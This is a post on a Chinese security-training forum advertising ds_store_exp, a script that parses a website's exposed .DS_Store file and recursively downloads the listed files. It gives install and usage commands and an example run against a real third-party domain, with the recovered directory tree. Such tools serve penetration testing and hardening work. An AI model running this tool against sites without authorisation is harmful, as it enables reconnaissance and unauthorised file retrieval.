设为首页收藏本站
切换到窄版

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
暗月安全培训论坛»论坛 安全板块 安全软件 .DS_Store文件泄露利用工具
返回列表 发新帖
查看: 164|回复: 0

.DS_Store文件泄露利用工具

[复制链接]
月师傅

91

主题

0

回帖

371

积分

管理员

积分
371
发表于 2025-5-24 16:05:45 | 显示全部楼层 |阅读模式
.DS_Store文件泄露利用工具


ds_store_exp
A .DS_Store file disclosure exploit.

It parses .DS_Store file and downloads files recursively.

这是一个 .DS_Store 文件泄漏利用脚本,它解析.DS_Store文件并递归地下载文件到本地。

Usage: python ds_store_exp.py http://www.example.com/.DS_Store
Install
  1. pip install ds-store requests
复制代码


Example
  1. ds_store_exp.py http://hd.zj.qq.com/themes/galaxyw/.DS_Store

  3. hd.zj.qq.com/
  4. └── themes
  5.     └── galaxyw
  6.         ├── app
  7.         │   └── css
  8.         │       └── style.min.css
  9.         ├── cityData.min.js
  10.         ├── images
  11.         │   └── img
  12.         │       ├── bg-hd.png
  13.         │       ├── bg-item-activity.png
  14.         │       ├── bg-masker-pop.png
  15.         │       ├── btn-bm.png
  16.         │       ├── btn-login-qq.png
  17.         │       ├── btn-login-wx.png
  18.         │       ├── ico-add-pic.png
  19.         │       ├── ico-address.png
  20.         │       ├── ico-bm.png
  21.         │       ├── ico-duration-time.png
  22.         │       ├── ico-pop-close.png
  23.         │       ├── ico-right-top-delete.png
  24.         │       ├── page-login-hd.png
  25.         │       ├── pic-masker.png
  26.         │       └── ticket-selected.png
  27.         └── member
  28.             ├── assets
  29.             │   ├── css
  30.             │   │   ├── ace-reset.css
  31.             │   │   └── antd.css
  32.             │   └── lib
  33.             │       ├── cityData.min.js
  34.             │       └── ueditor
  35.             │           ├── index.html
  36.             │           ├── lang
  37.             │           │   └── zh-cn
  38.             │           │       ├── images
  39.             │           │       │   ├── copy.png
  40.             │           │       │   ├── localimage.png
  41.             │           │       │   ├── music.png
  42.             │           │       │   └── upload.png
  43.             │           │       └── zh-cn.js
  44.             │           ├── php
  45.             │           │   ├── action_crawler.php
  46.             │           │   ├── action_list.php
  47.             │           │   ├── action_upload.php
  48.             │           │   ├── config.json
  49.             │           │   ├── controller.php
  50.             │           │   └── Uploader.class.php
  51.             │           ├── ueditor.all.js
  52.             │           ├── ueditor.all.min.js
  53.             │           ├── ueditor.config.js
  54.             │           ├── ueditor.parse.js
  55.             │           └── ueditor.parse.min.js
  56.             └── static
  57.                 ├── css
  58.                 │   └── page.css
  59.                 ├── img
  60.                 │   ├── bg-table-title.png
  61.                 │   ├── bg-tab-say.png
  62.                 │   ├── ico-black-disabled.png
  63.                 │   ├── ico-black-enabled.png
  64.                 │   ├── ico-coorption-person.png
  65.                 │   ├── ico-miss-person.png
  66.                 │   ├── ico-mr-person.png
  67.                 │   ├── ico-white-disabled.png
  68.                 │   └── ico-white-enabled.png
  69.                 └── scripts
  70.                     ├── js
  71.                     └── lib
  72.                         └── jquery.min.js
复制代码

下载地址 https://github.com/lijiejie/ds_store_exp
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|暗月安全培训论坛

GMT+8, 2026-1-9 12:03 , Processed in 0.061315 second(s), 19 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表